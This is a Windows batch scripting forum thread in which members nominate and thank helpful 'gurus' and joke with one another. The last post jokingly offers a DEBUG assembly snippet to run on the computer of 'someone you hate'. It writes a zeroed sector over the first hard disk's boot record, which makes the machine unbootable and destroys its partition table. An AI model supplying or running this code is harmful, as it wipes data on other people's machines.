Most Helpful Dos/Cmd/Batch Gurus Poll

Discussion forum for all Windows batch related topics.

Moderator: DosItHelp

Cleptography

Most Helpful Dos/Cmd/Batch Gurus Poll

#1 Post by Cleptography » 02 Jun 2011 22:46

This is an informal poll for anyone visiting dostips forum or ss64 to give feed back to the most helpful gurus relating to advice been given and / or received on problems and solutions. The polling system on this forum does not work, so instead just leave a message with your choice/s and maybe a note of thanks letting that guru know you appreciate the time they have taking in helping you with advice. If there is a name that was left off this list feel free to add them and give thanks.

LIST OF GURUS:
jeb
bluesxman
Dbenham
Simon Sheppard
aGerman
avery_larry
DosItHelp
DOStips
Ed Dyreen
amel27
!k
Orange_batch
nitt
Chimaera
NDog
sarbjitsinghgill

phillid

Re: Most Helpful Dos/Cmd/Batch Gurus Poll

#2 Post by phillid » 02 Jun 2011 22:54

It may help to post this as a poll :) Just look at the bottom of the page when you post a new thread.

Cleptography

#3 Post by Cleptography » 02 Jun 2011 22:57

phillid wrote:It may help to post this as a poll :) Just look at the bottom of the page when you post a new thread.

Read the post again, the polling system on this forum is broken, I would not say disabled as phpbb would not show the polling system as an option if it was disable in control panel, but when I set it up it does not allow you to vote Ed had the same problem so I did it like this instead. :wink:

Ed Dyreen
Expert

#4 Post by Ed Dyreen » 02 Jun 2011 23:23

Before I discoverd this forum, I really thought I was the best batcher.

Thanx Jeb 'The guru'
If you weren't here sharing your insight, I would never have become a member !
You made me realize I am far from where you stand. Can you say something unprofessional pleaze ?
Thanx DBenham 'The ant'
You always answer peoples questions thoroughly and with dedication. You are one of the very few sharing my interest. Stability, Speed &Style. I like your 'experiments' they look so like my own. I like your persistance aswell.
Thanx Cleptography 'you bastard'
I respect you. Not because you're good at batch, but because you are really funny and fun to talk with.

I have 3 votes because I'm worth it :mrgreen: +1 for nitt ( I don't have a name for you just wait ! )

‼.•¤»{ƒ®εεΩ۩ïβε±}«¤•.‼

▼↓↓↓ I vote nitt aswell ↓↓↓▼ My end ? You will never get me :lol:
Last edited by Ed Dyreen on 28 Jun 2011 23:54, edited 30 times in total.

nitt

#5 Post by nitt » 02 Jun 2011 23:25

If you vote me I'll kill you... That's it Ed today is your end.

Ed, Clept, and aGerman are good. I think.

Cleptography

#6 Post by Cleptography » 02 Jun 2011 23:52

Thanks to Jeb for their professionalism and clear cut answers. Their advice is well respected not only here but all throughout internet land. I think Jeb is a woman not that it makes any difference, but they are very talented

Thanks to Ed Dyreen whose creativity has truly inspired me, and I enjoy the witty banter as well you bastard

Thanks to Bluesxman over at ss64 they are also a very talented well informed DOS guru.

I will not dare thank nitt because I don't feel like dying anytime soon, but their projects have been fun to play around with.

You can't vote me I'm just a sarcastic a$$ I have not helped anyone. I'm just here for the :arrow: milk and cookies.

Ed Dyreen
Expert

#7 Post by Ed Dyreen » 29 Jun 2011 00:05

And if you vote against me, I WILL " :twisted: " ( Someone you hate ?, run this code on their x86 )

Code: Select all

F 9000:0 L 200 0
A
Mov dx,9000
Mov es,dx
Xor bx,bx
Mov cx,0001
Mov dx,0080
Mov ax,0301
Int 13
Int 20

U 100 L 12